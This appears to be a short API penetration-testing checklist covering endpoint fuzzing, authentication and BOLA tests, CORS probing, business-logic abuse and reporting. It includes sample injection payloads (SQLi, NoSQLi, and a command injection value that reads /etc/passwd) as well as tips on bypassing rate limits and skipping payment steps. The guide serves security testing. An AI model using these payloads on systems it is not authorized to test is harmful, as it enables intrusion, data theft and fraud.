1. Endpoint Enumeration & API Mapping
Start by gathering documentation (Swagger, Postman), analyzing JavaScript files, and monitoring network traffic for hidden endpoints.
ffuf -u https://target.com/api/FUZZ -w wordlists/api.txt -mc all2. Authentication Testing
Test for broken JWT logic, token reuse, expired session acceptance, and vulnerable OAuth flows.
3. BOLA (Broken Object Level Authorization)
Try modifying object IDs to access other users' data:
GET /api/users/12345 → change to /api/users/123464. Injection Attacks
Target input filters via JSON, XML, or URL-encoded bodies. Common attacks:
- SQLi:
{"query":"1 OR 1=1"} - NoSQLi:
{"username": {"$gt": ""}} - Command Injection:
cmd=ls; cat /etc/passwd
5. Rate Limiting
Bypass or abuse rate-limiting logic by rotating tokens, IPs, or user agents.
6. Security Misconfigurations
Look for verbose error messages, exposed stack traces, and CORS misconfigs:
curl -X OPTIONS -i https://api.target.com/data -H "Origin: evil.com"7. Business Logic Attacks
Manipulate workflows: refunding items twice, price tampering, or skipping payment logic entirely.
8. Final Reporting
Document vulnerabilities with:
- Request/response pairs
- Impact and exploitation method
- Remediation recommendations
Pro tip: Use Burp Suite with extensions like JWT Editor, Authorize, and InQL for GraphQL support.